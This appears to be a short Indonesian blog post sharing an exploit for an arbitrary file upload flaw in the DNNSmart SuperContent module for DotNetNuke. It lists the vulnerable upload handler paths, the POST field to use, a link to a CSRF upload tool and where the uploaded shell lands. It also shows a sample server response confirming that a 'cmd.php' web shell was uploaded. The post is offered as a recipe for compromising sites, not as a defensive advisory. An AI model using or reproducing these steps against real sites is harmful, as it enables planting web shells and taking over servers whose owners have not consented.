olNGIb4NkK5r2x7x4oG3GpEzizVpnY6KNCck9cym
Home  ›  Vulnerability

DNNSmart SuperContent Arbitari File Upload With Csrf

(Updated: ) Posting Komentar

Vendor :

  • http://www.dnnsmart.net/DNNSmartStore.aspx

    • Google Dork : N/A

    Exploit1 :

  • - /desktopmodules/DNNSmart_SuperContent/AjaxHandler/FileUploadHandler.ashx

    • Exploit2 :

  • - /dotnetnuke/desktopmodules/DNNSmart_SuperContent/AjaxHandler/FileUploadHandler.ashx

    • CSRF : http://secpriv8.com/tools/csrf/

    POST File: files[]

    Shell Path : site.com/[path]/AjaxHandler/ ur shell.aspx

    Tested On : Android 9

    Vuln Example :

    {"files":[{"deleteType":"DELETE","deleteUrl":"http:\/\/site.com\/dotnetnuke\/desktopmodules\/DNNSmart_SuperContent\/AjaxHandler\/FileUploadHandler.ashx?file=cmd.php","error":"","name":"cmd.php","size":15749,"type":"","url":"http:\/\/site.com\/dotnetnuke\/desktopmodules\/DNNSmart_SuperContent\/AjaxHandler\/FileUploadHandler.ashx?file=cmd.php"}]}

    Source : https://pastebin.com/6WU8u3MY

    Related Posts
    Lebih baru Lebih lama

    Related Posts

    Posting Komentar

    Berkomentarlah Dengan Sopan Paman :)
    Anda sopan Kami segan :)